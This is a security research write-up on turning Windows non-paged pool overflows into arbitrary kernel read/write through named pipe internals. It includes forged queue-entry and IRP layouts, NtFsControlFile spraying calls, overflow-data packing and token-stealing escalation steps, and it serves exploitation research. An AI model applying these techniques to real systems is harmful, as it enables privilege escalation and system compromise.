Table of Contents
- Introduction
- Named-Pipes Introduction
- Exploitation
- Future work
- References
In this document we provide a series of techniques that can be used to exploit overflows in the non-paged pool on Windows. The techniques (ab)use the functionalities provided by the named pipe file system (npfs) to turn the overflow into arbitrary read/write and escalate privileges.
The following table shows the exploitability coverage provided by the present document over different overflow categories, based on the level of control over:
- Overflow data. In other words, is the overflow composed of user data or "random" data? e.g.
memcpy(vulnerable_chunk, user_controlled_data, overflow_size)
vs
memset(vulnerable_chunk, 0, overflow_size)
- Overflow size. e.g.
memcpy(vulnerable_chunk, input_buffer, user_controlled_size)
vs
memcpy(vulnerable_chunk, input_buffer, random_size)
| | Overflow Size Control | No Overflow Size Control |
|---|---|---|
| Overflow Data Control | ✔ | ✔ |
| No Overflow Data Control | ✔ | ✓ |
Previously documented techniques on the topic fell primarily under the category "Overflow Data Control && Overflow Size Control" and the goal of this research was to expand that coverage. This research was triggered after seeing the Project Zero analysis on CVE-2020-17087 mentioning the use of named pipes to establish arbitrary write, a primitive that was not documented (at the time).
For further discussion on the table above, see the "Approaching Different Pool Overflow Categories" chapter. Now we will get into the concepts related to named pipes that would allow us to build the exploitation primitives.
Named pipes are an inter-process communication mechanism that allows two processes, potentially on different computers, to share data. A brief description of their operation (for more information see [1]): a named pipe connection has a server end, which creates the pipe, and a client end, which connects to that pipe. When a named-pipe connection is established, the underlying driver creates two queues, one for each end, within the Context Control Block (CCB). The CCB, in the context of the npfs, is an undocumented structure used to hold information about a particular server/client connection. The queues found within the CCB store entries that are primarily related to data written by "the other" end or to pending read operations by the current end. The structure used for the queue entries is the following:
struct DATA_QUEUE_ENTRY {
    LIST_ENTRY NextEntry;
    _IRP* Irp;
    _SECURITY_CLIENT_CONTEXT* SecurityContext;
    uint32_t EntryType;
    uint32_t QuotaInEntry;
    uint32_t DataSize;
    uint32_t x;
    char Data[];
};
Note: this is an undocumented structure, some information was obtained through ReactOS
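For reference, the layout above can be mirrored with Python's ctypes to compute the header size and field offsets used later in this document. This is a sketch assuming x64 (8-byte pointers); since the structure is undocumented, the offsets are assumptions, not official definitions.

```python
import ctypes

# Mirror of the (undocumented) DATA_QUEUE_ENTRY header, assuming x64.
class LIST_ENTRY(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint64),
                ("Blink", ctypes.c_uint64)]

class DATA_QUEUE_ENTRY(ctypes.Structure):
    _fields_ = [("NextEntry",       LIST_ENTRY),
                ("Irp",             ctypes.c_uint64),
                ("SecurityContext", ctypes.c_uint64),
                ("EntryType",       ctypes.c_uint32),
                ("QuotaInEntry",    ctypes.c_uint32),
                ("DataSize",        ctypes.c_uint32),
                ("x",               ctypes.c_uint32)]
    # the variable-length Data[] follows the header for buffered entries

print(hex(ctypes.sizeof(DATA_QUEUE_ENTRY)))    # header size
print(hex(DATA_QUEUE_ENTRY.EntryType.offset))  # offset of EntryType
```

Under these assumptions the header occupies 0x30 bytes, which matters later when forging entries and sizing overflows.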
An overview of the fields above and some of the mechanisms implemented by npfs:
NextEntry: used to create a doubly linked list with all the queued data entries. Entries are primarily related to read and write operations. One way of creating write operation entries is through the WriteFile API call and those entries are removed from the list when all of their data are read by a client (e.g. using the ReadFile). The list includes a sentinel node, which is stored within the CCB of the named pipe.
SecurityContext:
nt!_SECURITY_CLIENT_CONTEXT
+0x000 SecurityQos : _SECURITY_QUALITY_OF_SERVICE
+0x010 ClientToken : Ptr64 Void
+0x018 DirectlyAccessClientToken : UChar
+0x019 DirectAccessEffectiveOnly : UChar
+0x01a ServerIsRemote : UChar
+0x01c ClientTokenControl : _TOKEN_CONTROL
This field enables the server end of a named pipe to impersonate the security context of a client. An overview of how it works:
1. The client writes some data to the server queue.
2. A DATA_QUEUE_ENTRY is created and its SecurityContext is populated with the current security context of the client.
3. Steps (1) and (2) can be repeated, each time capturing the security context of the client.
4. When the server performs a read operation (and if there was no previous file system control request with code 0x110044, see below), the SecurityContext of the current entry is stored in the CCB of the named pipe connection. Interestingly, this step is also performed by the peek operation.
5. The server can then call ImpersonateNamedPipeClient, which will attempt to impersonate the security context stored in the CCB after step (4).
It is noted that npfs exposes two file system operations related to impersonation.
- fsctl code=0x11001C (FSCTL_PIPE_IMPERSONATE): this is the operation called with ImpersonateNamedPipeClient. The underlying code appears to be an inlined-optimized version of a call to NpImpersonate with specific arguments through which it attempts to impersonate the security context stored in the Ccb.
- fsctl code=0x110044 (unknown): calls the NpImpersonate directly with specific arguments that cause the impersonation functionality to be permanently disabled for the given np connection. So step (4) above only works if there was no previous call to this operation.
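To make the sequencing above concrete, here is a toy Python model of the capture/impersonation flow. The names and structures are purely illustrative, not real npfs internals or APIs.

```python
# Toy model of the npfs impersonation flow (illustrative names only).
class Ccb:
    def __init__(self):
        self.security_context = None         # context captured for impersonation
        self.impersonation_disabled = False  # set by fsctl code 0x110044

def client_write(queue, data, client_context):
    # steps (1)-(3): each write captures the client's current security context
    queue.append({"data": data, "security_context": client_context})

def server_read(queue, ccb):
    # step (4): a read stores the entry's context in the CCB (unless disabled)
    entry = queue.pop(0)
    if not ccb.impersonation_disabled:
        ccb.security_context = entry["security_context"]
    return entry["data"]

def impersonate_named_pipe_client(ccb):
    # step (5): FSCTL_PIPE_IMPERSONATE uses whatever context the CCB holds
    if ccb.security_context is None:
        raise PermissionError("no client context captured")
    return ccb.security_context

queue, ccb = [], Ccb()
client_write(queue, b"hello", "client-token-at-write-time")
server_read(queue, ccb)
print(impersonate_named_pipe_client(ccb))  # context captured at write time
```

Note how the context impersonated is the one captured when the client wrote, not the client's context at impersonation time; this detail is what the later "arbitrary SecurityContext free" approach abuses.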
EntryType: Data entries can have different types which change the way data in the structure are treated. Two important types are buffered and unbuffered entries.
Buffered Entries:
The DATA_QUEUE_ENTRY allocated is big enough to hold the actual data of the request. Buffered entries are subject to the quota management mechanism which we will see later on and can be created through the regular WriteFile API call.
Unbuffered Entries:
The DATA_QUEUE_ENTRY allocated is big enough to hold the header without the data. The Irp related to the request is linked to the entry and references the actual data of the request. One way to create unbuffered entries is by calling the NpInternalWrite (fsctl code: 0x119FF8).
Irp: the IRP associated with the DATA_QUEUE_ENTRY. Two of the cases where this field is populated are:
a) When we have unbuffered entries
b) When a buffered entry is created with its size exceeding the available pipe quota.
QuotaInEntry: This field denotes the quota consumed by the particular entry. For unbuffered entries it is 0. In buffered entries, it starts equal to DataSize and decreases with every read until its value drops to 0.
DataSize: This is the length of the user data associated with the current DATA_QUEUE_ENTRY
x: this field is uninitialized at entry creation and is probably used for padding
Quota management mechanism: allows the server-end of the communication channel to specify the maximum size of data the queues can hold. When that limit is exceeded:
- In blocking mode (PIPE_WAIT) the entry is created with QuotaInEntry set to the number of bytes available in the current queue. Then, after every read (not peek) operation on a buffered entry, the read size gets added to the QuotaInEntry of the stalled write. When the QuotaInEntry becomes equal to the DataSize, that signals that there is enough space to hold that entry in the pipe's quota and its associated irp gets completed and removed from the current data entry.
- In non-blocking mode (PIPE_NOWAIT), the operation will fail. (the number of written bytes will be equal to 0)
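A rough Python simulation of the blocking-mode bookkeeping described above. This is illustrative only and ignores most details of the real implementation (per-end quotas, reads spanning multiple entries, IRP completion, etc.).

```python
# Toy simulation of PIPE_WAIT quota management for buffered entries.
class Pipe:
    def __init__(self, quota):
        self.quota = quota   # free quota bytes for this queue
        self.queue = []      # buffered DATA_QUEUE_ENTRY-like records

    def write(self, size):
        # an over-quota write is queued with only the available quota and
        # keeps its IRP pending (the "stalled write")
        entry = {"DataSize": size,
                 "QuotaInEntry": min(size, self.quota),
                 "IrpPending": size > self.quota}
        self.quota -= entry["QuotaInEntry"]
        self.queue.append(entry)
        return entry

    def read(self, size):
        # read from the head entry, then credit the read bytes to the oldest
        # stalled write; once QuotaInEntry reaches DataSize, its IRP completes
        head = self.queue[0]
        n = min(size, head["DataSize"])
        head["DataSize"] -= n
        if head["DataSize"] == 0:
            self.queue.pop(0)
        for e in self.queue:
            if e["IrpPending"]:
                e["QuotaInEntry"] += n
                if e["QuotaInEntry"] >= e["DataSize"]:
                    e["IrpPending"] = False   # stalled write completes
                break
        return n

p = Pipe(quota=10)
p.write(10)              # fits exactly, quota now exhausted
stalled = p.write(4)     # stalled: QuotaInEntry=0, IRP kept pending
p.read(4)                # 4 read bytes get credited to the stalled write
print(stalled["IrpPending"])  # the stalled write has now completed
```

The "read bytes credited to a stalled write" step is exactly what the arbitrary write technique later abuses, by forging an entry that looks like a stalled write.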
In the past, Alex Ionescu documented in a blogpost [2] the use of buffered entries to spray the non-paged pool. Another simple way of spraying the non-paged pool is through the use of unbuffered entries. As we have seen before, unbuffered entries allow memory allocations with complete control over both the size and the data (i.e. no DATA_QUEUE_ENTRY headers within the chunk). The fact that we have full control over the data makes unbuffered entries more suitable for some cases, since:
- They can be used to forge data structures with complete precision (e.g. when exploiting UAF issues)
- The operation that involves a forged data structure might have to free the object at the end of its procedure. If our forged structure is not aligned at the beginning of a pool chunk, it will cause a bug check in most allocators (probably all allocators except LFH) during the free procedure.
The following code can be used to create unbuffered entries:
//create the pipe/file in FILE_FLAG_OVERLAPPED mode (blocking mode)
NtFsControlFile(pipe_handle, 0, 0, 0, &isb, 0x119FF8, buf, sz, 0, 0);
It is noted that unbuffered entries are created mainly through the NpInternal* functions, and it's not certain whether those functionalities are meant to be exposed to userspace code. For example, NpInternalTransceive doesn't permit direct calls from userspace programs.
- Establish an arbitrary read by using the overflow to rewrite the DATA_QUEUE_ENTRY headers and forge an unbuffered entry. This technique was first documented by Corentin Bayet and Paul Fariello in [3]. It is noted that this was also the first research documenting the use of named pipes to establish a read primitive and exploit a pool overflow.
The forged entry would look like this:
DATA_QUEUE_ENTRY:
NextEntry=whatever;
Irp=Forged IRP Address;
SecurityContext=ideally 0;
EntryType=1;
QuotaInEntry=ideally 0;
DataSize=arbitrary read size;
x=whatever;
IRP->SystemBuffer = arbitrary read address
For convenience, we can set the Irp to a userspace address (in the absence of SMAP), but that's not our only option.
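Packing such a forged entry (x64, little endian) is straightforward; the layout follows the DATA_QUEUE_ENTRY struct shown earlier, and the concrete addresses below are placeholders:

```python
import struct

# Pack a forged unbuffered DATA_QUEUE_ENTRY header (x64, little endian).
# Addresses are placeholders; field meanings follow the listing above.
def forge_unbuffered_entry(forged_irp_addr, read_size):
    return struct.pack(
        "<QQQQIIII",
        0x4141414141414141,  # NextEntry.Flink: whatever
        0x4141414141414141,  # NextEntry.Blink: whatever
        forged_irp_addr,     # Irp: address of the forged IRP
        0,                   # SecurityContext: ideally 0
        1,                   # EntryType=1: unbuffered
        0,                   # QuotaInEntry: ideally 0
        read_size,           # DataSize: arbitrary read size
        0)                   # x: whatever

blob = forge_unbuffered_entry(0x00007fff00010000, 0x100)
print(hex(len(blob)))  # one 0x30-byte header
```

The blob can then be sprayed into the pool (e.g. as the data of real unbuffered entries) or written at the userspace address the overflown Flink points to.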
- Disclose the memory adjacent to the overflown chunk by using the overflow to rewrite the DATA_QUEUE_ENTRY headers and forge a buffered entry with DataSize bigger than the original value. This technique appears to have been first documented by @scwuaptx through a HITCON CTF challenge [4].
This technique can be used to leak pointers/heap metadata and other interesting data that could be found/placed after our DATA_QUEUE_ENTRY.
To make this work, the forged DATA_QUEUE_ENTRY should look like this:
DATA_QUEUE_ENTRY:
NextEntry=whatever;
Irp=ideally 0;
SecurityContext=ideally 0;
EntryType=0;
QuotaInEntry=ideally 0; //mostly irrelevant in case we use the peek operation
DataSize=something bigger than the original size;
x=whatever;
There are some cases where we might have a limited set of characters at our disposal to overflow the memory with (e.g. RtlZeroMemory(buffer, bufferlen+1)). In those cases, we can overflow the Flink of a DATA_QUEUE_ENTRY and make it point to a location where we have full control over the data. We can then use the techniques previously described to establish the memory reads. On most supported 64-bit architectures we have to be careful to craft canonical addresses. With this taken into consideration, and assuming a little-endian architecture, one easy way to redirect the Flink to a controlled location is to overwrite only its first couple of bytes, since that will make the DATA_QUEUE_ENTRY point to a memory location near the current entry. Then, with proper heap grooming, we make that location contain the forged DATA_QUEUE_ENTRY for relative/arbitrary memory reads.
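A quick sketch of why the partial little-endian overwrite keeps the pointer canonical and nearby (the addresses are illustrative):

```python
import struct

# Partial pointer overwrite, little endian: rewriting only the low bytes of
# the Flink keeps the high (canonical) part of the kernel address intact and
# redirects it to a nearby, groomable location.
flink = 0xffff9a8b12345678                 # original Flink (victim -> cover)
raw = bytearray(struct.pack("<Q", flink))
raw[0:2] = b"\x00\x00"                     # overflow only the two low bytes
redirected = struct.unpack("<Q", bytes(raw))[0]

print(hex(redirected))                     # high 6 bytes unchanged
print(hex(flink - redirected))             # displacement, at most 64 KiB
```

Since at most the low 16 bits change, the redirected pointer lands within a 64 KiB window of the original entry, which is what makes the grooming step feasible.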
This technique is illustrated below:
In this diagram, we see that the victim entry was originally pointing to the cover entry. After the overflow, its Flink got redirected and now points to the undercover DATA_QUEUE_ENTRY, which is composed of user-controlled data. We then use the memory disclosure technique described before to leak the data of "chunk 2". It is noted that there are cases where the babushka entry could end up being the same as the cover entry, as for example in the poc provided for vuln_driver_al20c
After getting the layout above, what's left is to read DataSize+DataSize1-sizeof(DATA_QUEUE_ENTRY)+n bytes, after which we will be able to read n bytes from "chunk 2". The DataSize2 should be at least DataSize1-sizeof(DATA_QUEUE_ENTRY)+n
In practice, there is one more challenge before using this technique. After Windows 7, Microsoft implemented safe unlinking of the LIST_ENTRY members. Because of that, after reading DataSize bytes, the overflown DATA_QUEUE_ENTRY will get removed from the queue and its Flink/Blink will be validated, which in our case will trigger a bug check (entry->Flink->Blink != entry). Fortunately, we can work around this issue by performing a "read-only" operation on the pipe queue through the use of PeekNamedPipe.
So a practical approach to what we discussed here is:
- Groom the pool memory to ensure the overwritten Flink (i.e. cover entry address) will be displaced to a memory location containing the undercover DATA_QUEUE_ENTRY. The undercover data entry will facilitate a relative memory disclosure. The Flink of the undercover data entry should point to a memory location which the user can modify, like for example a userspace address.
- Overflow the Flink of the victim entry.
- Use PeekNamedPipe with size<DataSize+DataSize2 to activate the undercover DATA_QUEUE_ENTRY and leak adjacent pool memory. The goal here is to leak some interesting pointers and bypass ASLR; a data entry is a perfect fit for our purpose.
- Modify the contents of the specified userspace address to hold a forged DATA_QUEUE_ENTRY that facilitates the arbitrary read. Use PeekNamedPipe with size=DataSize+DataSize2+n to leak n bytes from the address set in the SystemBuffer of the IRP.
- Repeat steps (3) and (4) as deemed necessary.
The approach discussed here is illustrated below:
As with the arbitrary read, establishing any sort of write primitive using named pipes became more difficult with the hardened LIST_ENTRY operations. On Windows 7, for example, it was possible to write a kernel address (the queue sentinel node in the Ccb) to an arbitrary location. We could have done it by forging a DATA_QUEUE_ENTRY with its Flink set to the target address and then reading the whole data entry. That would cause the data entry to get unlinked from the list, which would cause the execution of dqe->Flink->Blink=dqe->Blink. As a target address we could have potentially used the size field of a suitable GDI object.
Post-Windows 7, we have to follow a different strategy. Here we assume that we have already established the relative/arbitrary read primitive suggested in "Limited control over the overflow data" chapter. So the plan is to abuse the quota management mechanism we discussed earlier on to forge a DATA_QUEUE_ENTRY that simulates a stalled write, through which we forge an IRP that would establish the arbitrary write upon its completion.
Now the biggest challenge is forging a valid IRP that would allow us to establish the arbitrary write upon completion. Since the IRP is a complicated structure and is legitimately processed by the kernel (i.e. IofCompleteRequest), and not by the npfs as was the case in the arbitrary read technique, we have to be precise. The simplest way I found to achieve that was to create a data entry that contains an IRP, use the arbitrary read to read that IRP, modify the IRP so that it performs the arbitrary write upon completion, and create an unbuffered entry* to hold that forged IRP. Finally, with the forged IRP in place, we just make some room in the queue by reading some data, and we should be able to cause the completion of our forged IRP and thus establish the arbitrary write.
*: It's important to use an unbuffered entry to hold the forged IRP since it will most likely get deallocated by the end of the call to IofCompleteRequest.
For reference, the code related to the collection of soon to be completed IRPs can be found at the end of NpReadDataQueue in the inlined version of NpCompleteStalledWrites.
The simulated stalled DATA_QUEUE_ENTRY and forged IRP could look like this:
DATA_QUEUE_ENTRY:
NextEntry.Flink=accessible address;
Irp=Forged IRP Address;
SecurityContext=ideally 0;
EntryType=0;
QuotaInEntry=DataSize-1;
DataSize=arbitrary write size;
x=whatever;
Forged IRP:
Flags=Flags&~IRP_DEALLOCATE_BUFFER|IRP_BUFFERED_IO|IRP_INPUT_OPERATION;
AssociatedIrp=Source Address;
UserBuffer=Destination Address;
ThreadListEntry.Flink->Blink==ThreadListEntry.Blink->Flink==&ForgedIRPAddr->ThreadListEntry;
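The Flags manipulation above can be written out with the wdm.h IRP flag values (IRP_BUFFERED_IO=0x10, IRP_DEALLOCATE_BUFFER=0x20, IRP_INPUT_OPERATION=0x40). Clearing IRP_DEALLOCATE_BUFFER keeps IofCompleteRequest from freeing our fake system buffer, while the buffered-IO/input-operation combination makes the completion path copy AssociatedIrp.SystemBuffer into UserBuffer; the example input value is hypothetical.

```python
# wdm.h IRP flag values used in the Flags expression above.
IRP_BUFFERED_IO       = 0x00000010
IRP_DEALLOCATE_BUFFER = 0x00000020
IRP_INPUT_OPERATION   = 0x00000040

def forge_irp_flags(flags):
    # clear IRP_DEALLOCATE_BUFFER so completion does not free the fake
    # system buffer; set buffered-IO + input-operation so the completion
    # path copies AssociatedIrp.SystemBuffer into UserBuffer
    return flags & ~IRP_DEALLOCATE_BUFFER | IRP_BUFFERED_IO | IRP_INPUT_OPERATION

print(hex(forge_irp_flags(0x60060070)))  # hypothetical leaked Flags value
```

In Python (as in C), & binds tighter than |, so the expression is evaluated exactly as written in the listing above.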
To summarize:
- Spray the memory with data queue entries
- Use the steps laid out in the "Limited control over the overflow data" section to establish the relative/arbitrary read
- After step (1), it's likely that an adjacent chunk that can be reached through our relative read will hold a data entry. Identify that chunk and its handle (e.g. unique identifier in the Userdata or bruteforce), and find its address (dqe->Flink->Blink). In some cases, instead of identifying the handle of the "next" chunk, it might be easier to identify the address of the victim pipe. For example we find the address of the next_chunk (dqe->Flink->Blink) and then calculate the addresses of the previous/following chunks and try to identify the victim entry. (for example in the poc for CVE-2020-17087 we know that victim_entry->Flink%0x10000==0x0020)
- Create a data entry on the identified handle that will have an IRP. I have tested this with a buffered entry while the pipe quota was exceeded, but it should also work for unbuffered entries.
- The new entry should be added to the data queue next to the leaked entry. Use the arbitrary read to find the address of the newly created entry (leaked_entry->Flink), its IRP address and finally the IRP data.
- Modify the IRP to enable the arbitrary write as shown above. For example in the pocs, the Source Address is set to the system process token and Destination Address is set to the current process token. It is noted that we can easily identify the aforementioned addresses through the IRP found at step (5) and its associated thread information.
- Read 1 byte to trigger the arbitrary write. Note: it should be possible to set the QuotaInEntry to DataSize and trigger the completion of the IRP with a zero read length via an FSCTL_PIPE_INTERNAL_READ_OVFLOW operation on the pipe.
This could be an alternative to the arbitrary write for escalating privileges. As we have already seen, after each read operation on a data entry there will be an attempt to determine whether the current SecurityContext should be stored in the current Ccb or not. What's interesting for our purpose is the fact that, in case the SecurityContext field of the DATA_QUEUE_ENTRY is populated, there will be a call to NpFreeClientSecurityContext with one of the following two arguments:
- the SecurityContext stored in the DATA_QUEUE_ENTRY, in case client impersonation is disabled as described in the intro.
- the SecurityContext stored in the Ccb, in case impersonation is enabled. Essentially, the old context is cleaned up before being replaced with the new one.
For reference, the code segment inside NpReadDataQueue where this functionality is implemented is shown below:
Option (1) appears to be more straightforward, since it frees the security context found in the current entry instead of the previous one, but either of the two should be usable.
So a high-level overview of how this could potentially be exploited is to forge a SECURITY_CLIENT_CONTEXT structure that is impersonable by the server, holds elevated privileges but doesn't require special permissions to impersonate (e.g. see the remarks).
Steps:
- The steps at the beginning should be similar to the arbitrary write process. First, we establish the relative/arbitrary read, leak IRP data, find the current thread/process and potentially other elevated tokens that would enable us to construct that special token that is impersonable without permissions.
- Find the pipe handle and the address of an entry that is different from the one used to establish the read/free primitive. Let's call it pipe_handle_client/pipe_handle_server.
- Create n entries writing into the pipe_handle_client
- Start from the last entry and read its SecurityContext using the arbitrary read
- Trigger the arbitrary free on the address acquired in step (4)
- Spray unbuffered entries with the forged SECURITY_CLIENT_CONTEXT created in (1)
- Use the arbitrary read to verify whether we managed to replace the memory pointed by the stored SecurityClient context in (4) with the forged SECURITY_CLIENT_CONTEXT
- If that fails, go to the previous data entry (Blink) and repeat step (4). Entries for which we were unable to allocate our forged SCC should be considered corrupted, and an attempt to read from them will most likely trigger a BSOD. That's why we start from the end of the list and move backward; this gives us n tries to allocate the forged structure.
- Read all the entries in pipe_handle_server until at least one byte is read from the overwritten SecurityContext (no more than its DataSize). At that point, the ClientContext with the forged data should already be copied to the Ccb of the pipe.
- Call ImpersonateNamedPipeClient on the pipe_handle_server
In the limited time spent testing this, I was able to attach a forged token to a thread, but the forged _TOKEN structure had some inconsistencies that needed fixing (e.g. integrity checks and fields pointing at absolute addresses within the token itself). Nevertheless, with some effort it should be possible to escalate using this technique.
Now we will have an overview of how the discussed techniques could be used in different overflow scenarios. Let's revisit the table we've seen in the introduction:
| | Overflow Size Control | No Overflow Size Control |
|---|---|---|
| Overflow Data Control | ✔ | ✔ |
| No Overflow Data Control | ✔ | ✓ |
- Data Control && Size Control
All of the techniques discussed here should be applicable.
- Data Control && No Size Control
The exploitation of the overflows in this category should be similar to that of the overflows found in "No Data Control && No Size Control", which is described below. The only difference is that we have control over the overflow data, and as such we can avoid the problem of corrupted pipes. For example, as overflow data we can repeatedly use an address under our control (e.g. a userspace virtual address) that holds a forged data entry, e.g.
overflow_data = struct.pack("<Q", userspace_address)*(overflow_size//8) + victim_entry_flink_bytes
The goal is to make the "padding memory" data entries look like this:
DATA_QUEUE_ENTRY:
NextEntry=userspace_address;
Irp=userspace_address;
SecurityContext=userspace_address;
EntryType=userspace_address;
QuotaInEntry=userspace_address;
DataSize=userspace_address;
x=userspace_address;
Based on the implementation of the function NpReadDataQueueEntry, which is used for the read operations, data entries with EntryType values bigger than one are skipped safely (i.e. only NextEntry is used) when a peek operation is performed. So we can use the peek operation to identify the victim_entry, since the "padding memory" entries would use the forged data entry at userspace_address, in contrast to the victim entry, which would use the forged entry specified in the redirected Flink.
- No Data Control && Size Control
Here we should be able to use the techniques related to the Flink overflow in the "Limited control over the overflow data".
- No Data Control && No Size Control
This should be the most challenging overflow category to exploit. Its exploitability will be heavily dependent on the specifics of the underlying case. Let's say we have an overflow caused by something like this:
memset(vulnerable_chunk, 0, overflow_size)
The diagram below illustrates our initial state:
Since we have no control over the overflow data, we can try to apply the technique described in "Limited control over the overflow data". The goal now is to place a DATA_QUEUE_ENTRY near the end of the overflown area and attempt to have its Flink partially overflown (ideally by 1-2 bytes)
This approach is illustrated below:
As we can see in the diagram, it might be necessary to have padding memory between the vulnerable chunk and the victim entry in order to have the victim entry properly aligned for the overflow.
The size of padding memory required really depends on the vulnerable_chunk size and the overflow_size. Based on these, we have two possibilities:
i. No padding memory is required. In this case we can proceed normally with the rest of the steps to establish the read/write primitives. An example of this case is provided in the vulnerable_driver, where we essentially deal with an off-by-one overflow.
ii. Padding memory is needed. This is normally the case when overflow_size-vulnerable_chunk_size > usable_overflow_size+underlying_pool_header_size
To better understand when this situation might come up, let's briefly go through CVE-2020-17087, since it's one case where padding memory is required.
The parameters of the overflow are the following:
vulnerable_chunk_size = (user_controlled_size*6)%65536;
vulnerable_chunk = AllocateMemory(vulnerable_chunk_size);
memset(vulnerable_chunk, 0x30, user_controlled_size*6); //not the same, but mostly equivalent
In this case we can have the following overflow parameters:
user_controlled_size = 0x2ae3;
vulnerable_chunk_size = (0x2ae3*6)%65536 = 0x152;
vulnerable_chunk = AllocateMemory(0x152); //it falls into the 0x170 LFH bucket
memset(vulnerable_chunk, 0x30, 0x10152);
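The truncation arithmetic above can be verified directly:

```python
# The 16-bit wrap behind CVE-2020-17087: the allocation size is truncated
# modulo 65536 while the memset size is not.
user_controlled_size = 0x2ae3
alloc_size  = (user_controlled_size * 6) % 65536  # size of the allocated chunk
memset_size = user_controlled_size * 6            # size actually memset

print(hex(alloc_size))                 # falls into the 0x170 LFH bucket
print(hex(memset_size))                # total bytes written
print(hex(memset_size - alloc_size))   # bytes written out of bounds
```

So a single trigger writes 0x10000 bytes past a 0x152-byte allocation, which is why so much padding memory has to be groomed.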
To exploit this issue with the Flink overflow technique, the following memory layout is required:
So we have usable_overflow_size=1-4, which is the number of bytes needed to use our technique and overflow the Flink, but the overflow goes way beyond that: 0x10152-0x170 bytes. The bytes beyond those used for the Flink overflow represent the padding memory.
Now, to make things work, we have to control the allocations in the padding memory before the overflow. That's because we don't want any operations performed within that memory after the overflow, since everything is going to be overwritten (e.g. corrupted pool allocator metadata, data structures, etc). Some options for dealing with the padding memory:
a. At medium integrity, if possible, spray the memory with objects whose addresses we can leak (e.g. via NtQuerySystemInformation) and make sure we have the appropriate pool layout before triggering the overflow.
b. At low integrity, we use data entries to fill that memory. The biggest challenge here is the identification of the victim entry after the overflow. After the overflow, the state we are left with is a bunch of corrupted data entries (the entries that fill the padding memory) and only one valid entry (the victim entry). In this situation, we have a problem that derives from the fact that the pool chunk allocation order does not always translate to the order the chunks are placed in memory (e.g. chunkB is allocated after chunkA, but it might be placed before chunkA in memory). For example, this is the expected behavior when the LFH services the victim chunk size. In addition, operations performed on the corrupted entries would lead to a BSOD.
Given the above, we can't always know/calculate where the victim_entry handle is. Unfortunately, I couldn't identify a solid solution to this problem. Nevertheless, since this capability would allow us to have a universal set of techniques that would work on virtually any non-paged pool overflow situation, I have dedicated the chapter "Identifying Corrupted Pipes" to discuss the topic in more depth.
Now, in case the victim chunk size is not serviced by the LFH, or we can somehow guarantee that the creation order matches the memory allocation order, one way to identify the victim chunk would be to traverse the victim entries in reverse creation order until we identify the victim entry. It is noted that this was the strategy used in the CVE-2020-17087 poc, where the victim size was picked so that it was serviced by the Variable Size (VS) allocator.
In some cases, it's useful to have the ability to identify pipes with corrupted data entries. For example, when the overflow is caused by an integer overflow and we have the victim entry fall within the range of the Low Fragmentation Heap.
So we are now in the state shown in the diagram, we have the victim entry whose headers have been rewritten to facilitate the read/write primitive, but several data entries have been corrupted in the process. The problem here is that we normally don't know which pipe handle corresponds to the valid victim entry. One way to find it is to iterate over all the pipe handles and perform an operation that would verify that we are dealing with the victim entry (e.g. read operation that leaks next chunk data). In our instance, this is not a great approach as most operations on corrupted entries (e.g. read) will most likely cause a momentary change in the background image (i.e. cause BSOD). So we want to skip over them.
Two approaches to achieve that could be:
- Extract some of the headers of the data entry itself and validate their values. In practice, using the peek operation, we can extract the DataSize field as shown below:
PeekNamedPipe(pipe_handle, buf, 0, 0, 0, &remaining);
//remaining=FirstEntry->DataSize-alreadyRead
//so if remaining=="AAAAAAAAAA" it's most likely corrupted
- Find a functionality in npfs that can work through a corrupted data entry, and whose control flow/responses depend on the DATA_QUEUE_ENTRY headers. For example, by calling the operation that corresponds to the code 0x116000 (FSCTL_PIPE_INTERNAL_READ_OVFLOW) with a read length equal to 0, NpReadDataQueue will follow different code paths based on the value of the EntryType. If the EntryType is greater than 1, then the isb.Status will be equal to 0, otherwise it will be 0x80000005. (Note: there is also a semi-reliable timing channel that allows us to determine which path was taken.)
NtFsControlFile(pipe_handle, 0, 0, 0, &isb, 0x116000, buf, 0, buf, 0);
//isb.Status==0?"corrupted":"good" (assuming the overflow wrote something different from 0 or 1)
On the downside, there is a limitation with the examples provided above: they only work for pipes created with the PIPE_TYPE_MESSAGE flag. This is not ideal, since in practice we are then not able to use the peek operation to go past the first data entry and utilize the specially crafted Flink to activate our forged data entries (i.e. the approach used in "Limited control over the overflow data").
This behavior of the peek operation is a bit counter-intuitive (maybe a bug?) since the read mode of the operation is normally based on the read mode of the pipe and not its type mode. This is actually true for the ReadFile (i.e. uses read mode) but not for the peek operation (uses the type mode). In the documentation of PeekNamedPipe we see an attempt to explain this behavior (i.e. "The data is read in the mode specified with CreateNamedPipe. For example, create a pipe with PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE. If you change the mode to PIPE_READMODE_BYTE with SetNamedPipeHandleState, ReadFile will read in byte mode, but PeekNamedPipe will continue to read in message mode"). The problem is that this behavior remains even when the pipe is opened with "PIPE_TYPE_MESSAGE | PIPE_READMODE_BYTE", which doesn't appear to be conforming with the documentation.
Other than spraying and forging data structures, unbuffered entries can also be used to leak the overflown data. This works because their chunks in memory are composed entirely of user data, so there is no risk of corruption after the overflow (the pool header, if present, would still be corrupted). So after the overflow, the unbuffered entry will be filled with the overflow data, which we can then read back.
Potential use-cases:
- Leak potentially valuable information (e.g. interesting addresses)
- If we control the overflow data, then it could potentially be used to determine some information about the LFH state (or not)
- Let's say we are targeting the Low Fragmentation Heap (LFH) and we have the previously described problem of identifying corrupted pipes. We know that a subsegment can hold x objects of a target size, and we also assume that subsegments are allocated sequentially. So we allocate 2*x unbuffered entries and 1 buffered. We repeatedly induce the overflow (a prerequisite is a reliable way of triggering the vulnerability) until the overflow hits one of the buffered entries. We then go sequentially, in allocation order, through our pipes, read their contents and find the last overflown unbuffered entry (overflown_unbuffered_entry_index). The buffered entry allocated within the range overflown_unbuffered_entry_index-x to overflown_unbuffered_entry_index+x should be the victim_entry
- Maybe some other more practical use cases :)
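As a small sanity check of the index arithmetic in the LFH use case above (the concrete numbers are hypothetical):

```python
# With subsegments of x objects and a spray of 2*x unbuffered entries plus 1
# buffered entry, the buffered (victim) entry must sit within one subsegment
# of the last overflown unbuffered entry.
def victim_candidate_range(overflown_unbuffered_entry_index, x):
    return (overflown_unbuffered_entry_index - x,
            overflown_unbuffered_entry_index + x)

print(victim_candidate_range(23, 16))  # candidate indices for the victim
```

This narrows the set of pipes whose handles have to be probed with the corruption checks from "Identifying Corrupted Pipes".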
- Find a way to identify corrupted pipes in PIPE_TYPE_BYTE mode (should be a difficult task) or try to have Microsoft fix the important bug mentioned in "Identifying Corrupted Pipes"! (probably an even more difficult task). This would allow us to earn the final ✔ for the category "No Data Control && No Size Control".
